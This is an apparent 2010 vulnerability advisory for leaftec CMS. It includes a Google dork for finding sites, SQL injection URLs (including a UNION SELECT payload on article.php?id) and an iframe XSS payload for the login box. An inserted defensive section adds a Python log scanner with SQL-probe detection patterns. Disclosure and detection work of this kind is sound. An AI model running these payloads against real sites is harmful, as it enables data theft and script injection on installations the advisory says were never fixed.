Leaftec cms multiple vulnerabilities


# Exploit Title: leaftec cms multiple vulnerabilities

# Date: 21.03.2010

# Author: Valentin Hoebel

# Version:

# Tested on: Debian etch

# CVE:

# Code:

: General information

: Leaftec cms multiple vulnerabilities discovered

: By Valentin Hoebel

: Valentin@xenuser.org

: Product information

: Name = leaftec cms

: Vendor = leaftec

: Vendor Website = http://www.leaftec.de/

: About the product = http://www.leaftec.de/serv_cms.php

: Affected versions =

: Google dork: e.g. "©2006 leaftec Design"

: Vulnerabilities

#1 SQL Injection

Sadly the CMS is not available for free download but some German companies are using it.

Leaftec cms contains a blog feature which displays written content, file: article.php.

Vulnerable URL:

http://www.some-cool-domain.tld/article.php?id=XX

Examples for testing and injecting SQL stuff:

http://www.some-cool-domain.tld/article.php?id=

http://www.some-cool-domain.tld/article.php?id="

http://www.some-cool-domain.tld/article.php?id=XX+AND+1=2+UNION+SELECT+1,2,3,4,5,concat(version(),7--

(Tested on a live website using leaftec cms.)
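Since the advisory lists no fixed version, operators can at least triage web-server logs for the probes shown above. The following is an added example, not part of the original advisory: the log lines are constructed, the helper names `classify_id` and `scan` are hypothetical, and it assumes combined-format access logs and that legitimate `id` values are purely numeric.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Mar/2010:10:00:01 +0100] "GET /article.php?id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [21/Mar/2010:10:00:07 +0100] "GET /article.php?id=12%22 HTTP/1.1" 200 310',
    '203.0.113.9 - - [21/Mar/2010:10:00:09 +0100] "GET /article.php?id=12+AND+1=2+UNION+SELECT+1,2,3 HTTP/1.1" 200 5300',
    '203.0.113.7 - - [21/Mar/2010:10:00:11 +0100] "GET /article.php HTTP/1.1" 200 4000',
    '203.0.113.7 - - [21/Mar/2010:10:00:12 +0100] "GET /index.php?id=abc HTTP/1.1" 200 4000',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
SQL_TOKENS = re.compile(r"\b(union|select|and|or|concat|version)\b|--|/\*", re.I)

def classify_id(value):
    """Return None for a plain numeric id, else a short reason string."""
    if re.fullmatch(r"\d{1,10}", value):
        return None
    if SQL_TOKENS.search(value):
        return "sql-keywords"
    if any(c in value for c in "'\"`\\"):
        return "quote-probe"
    return "non-numeric"

def scan(lines, script="/article.php", param="id"):
    """Return (client_ip, status, reason, decoded_value) for suspicious requests."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith(script):
            continue
        # parse_qs decodes %XX and '+'; keep_blank_values also catches bare "id=" probes
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            reason = classify_id(value)
            if reason:
                findings.append((ip, int(status), reason, value))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same numeric-only rule can be enforced in front of the application (for example in a reverse proxy) as a stopgap until the code itself uses parameterized queries.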

--------------------------------------------------------------------------------------------------------

#2 XSS/HTML Code Injection

Several parts of the CMS allow HTML and JavaScript code injection, e.g. the login box.

After submitting the form, the CMS puts a red border around the login and password fields and also embeds the injected code into the website.

Example for HTML code:

"><iframe src=http://www.google.de></iframe>

--------------------------------------------------------------------------------------------------------

: Additional information

: Vendor contacted = 21.03.2010

: Vulnerabilities fixed = no reply received

: Solution = Upgrade to version XX or higher if available
